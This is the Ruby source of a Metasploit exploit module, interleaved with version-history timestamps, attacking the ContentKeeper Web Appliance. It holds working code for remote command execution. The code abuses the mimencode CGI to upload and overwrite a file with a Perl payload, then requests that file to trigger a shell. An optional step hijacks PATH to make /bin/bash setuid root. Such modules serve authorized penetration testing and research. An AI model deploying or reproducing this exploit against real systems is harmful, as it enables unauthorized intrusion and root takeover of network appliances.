2009-02-25 03:41:25 +00:00
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
2009-04-13 14:33:26 +00:00
# http://metasploit.com/framework/
2009-02-25 03:41:25 +00:00
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
2009-12-06 05:50:37 +00:00
Rank = ExcellentRanking
2009-02-25 03:41:25 +00:00
2010-10-09 06:55:52 +00:00
include Msf :: Exploit :: Remote :: Tcp
2009-02-25 03:41:25 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
2010-07-03 06:21:31 +00:00
'Name' = > 'ContentKeeper Web Remote Command Execution' ,
'Description' = > %q{
This module exploits the ContentKeeper Web Appliance . Versions prior
2009-02-25 03:41:25 +00:00
to 125 . 10 are affected . This module exploits a combination of weaknesses
2011-04-07 11:02:48 +00:00
to enable remote command execution as the Apache user . By setting
SkipEscalation to false , this module will attempt to setuid the bash shell .
2009-02-25 03:41:25 +00:00
} ,
2010-07-03 06:21:31 +00:00
'Author' = > [ 'patrick' ] ,
'Arch' = > [ ARCH_CMD ] ,
'License' = > MSF_LICENSE ,
'Version' = > '$Revision$' ,
'References' = >
[
2011-04-07 11:02:48 +00:00
[ 'OSVDB' , '54551' ] ,
[ 'OSVDB' , '54552' ] ,
2010-07-03 06:21:31 +00:00
[ 'URL' , 'http://www.aushack.com/200904-contentkeeper.txt' ] ,
] ,
'Privileged' = > false ,
'Payload' = >
2009-02-25 03:41:25 +00:00
{
'DisableNops' = > true ,
'Space' = > 1024 ,
2009-07-21 15:20:35 +00:00
'Compat' = >
{
'PayloadType' = > 'cmd' ,
2011-04-07 11:02:48 +00:00
'RequiredCmd' = > 'generic perl telnet' ,
2009-07-21 15:20:35 +00:00
}
2010-07-01 23:33:07 +00:00
} ,
2010-07-03 06:21:31 +00:00
'Platform' = > [ 'unix' ] ,
'Targets' = >
[
[ 'Automatic' , { } ]
] ,
2011-05-04 20:43:19 +00:00
'DisclosureDate' = > 'Feb 25 2009' ,
2009-02-25 03:41:25 +00:00
'DefaultTarget' = > 0 ) )
2010-07-03 06:21:31 +00:00
register_options (
2009-02-25 03:41:25 +00:00
[
Opt :: RPORT ( 80 ) ,
2011-04-07 11:02:48 +00:00
OptString . new ( 'OVERWRITE' , [ true , " The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc) " , 'spamkeeper.dat' ] ) ,
OptBool . new ( " SkipEscalation " , [ true , " Specify this to skip the root escalation attempt " , false ] ) ,
2009-02-25 03:41:25 +00:00
] , self . class )
end
def check
connect
sock . put ( " GET /cgi-bin/ck/mimencode HTTP/1.0 \r \n \r \n " )
banner = sock . get ( - 1 , 3 )
disconnect
if ( banner =~ / 500 Internal / )
return Exploit :: CheckCode :: Vulnerable
end
return Exploit :: CheckCode :: Safe
end
def exploit
exp = " # !/usr/bin/perl \n "
exp << " print \" Content-type: text/html \\ n \\ n \" \ ; \n \n "
2011-04-07 11:02:48 +00:00
exp << " use IO::Socket::INET; \n "
if ( datastore [ 'PAYLOAD' ] =~ / perl / )
if not datastore [ 'SkipEscalation' ]
print_status ( " Attempting to facilitate root escalation... " )
exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.
end
exp << payload . encoded . gsub ( 'perl -MIO -e ' , '' ) . gsub ( '\'' , '' ) # We're already inside a perl script!
else
exp << " system( \" "
exp << payload . encoded . gsub ( '"' , '\"' )
exp << " \" ); \n "
end
2009-02-25 03:41:25 +00:00
body = Rex :: Text . encode_base64 ( exp )
connect
2011-04-07 11:02:48 +00:00
sploit = " POST /cgi-bin/ck/mimencode?-u+-o+ #{ datastore [ 'OVERWRITE' ] } HTTP/1.1 \r \n "
2009-02-25 03:41:25 +00:00
sploit << " Host: #{ datastore [ 'RHOST' ] } \r \n "
sploit << " Content-Length: #{ body . length } \r \n \r \n "
2011-04-07 11:02:48 +00:00
print_status ( " Uploading payload to target... " )
2009-02-25 03:41:25 +00:00
sock . put ( sploit + body + " \r \n \r \n " )
disconnect
2011-04-07 11:02:48 +00:00
select ( nil , nil , nil , 3 ) # Wait a few seconds..
2009-02-25 03:41:25 +00:00
print_status ( " Calling payload... " )
connect
2011-04-07 11:02:48 +00:00
req = " GET /cgi-bin/ck/ #{ datastore [ 'OVERWRITE' ] } HTTP/1.1 \r \n " # Almost all files are owned by root, chmod'ed 777 :) rwx
2009-02-25 03:41:25 +00:00
req << " Host: #{ datastore [ 'RHOST' ] } \r \n "
sock . put ( req + " \r \n \r \n " )
2011-11-28 04:42:59 +00:00
handler
2009-02-25 03:41:25 +00:00
disconnect
2011-04-07 11:02:48 +00:00
select ( nil , nil , nil , 3 ) # Wait for session creation.
if not datastore [ 'SkipEscalation' ] and session_created? and datastore [ 'PAYLOAD' ] =~ / perl /
print_status ( " Privilege escalation appears to have worked! " )
print_status ( " /bin/bash is now root setuid! Type 'bash -p' to get root. " )
print_status ( " Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file). " )
end
2009-02-25 03:41:25 +00:00
end
end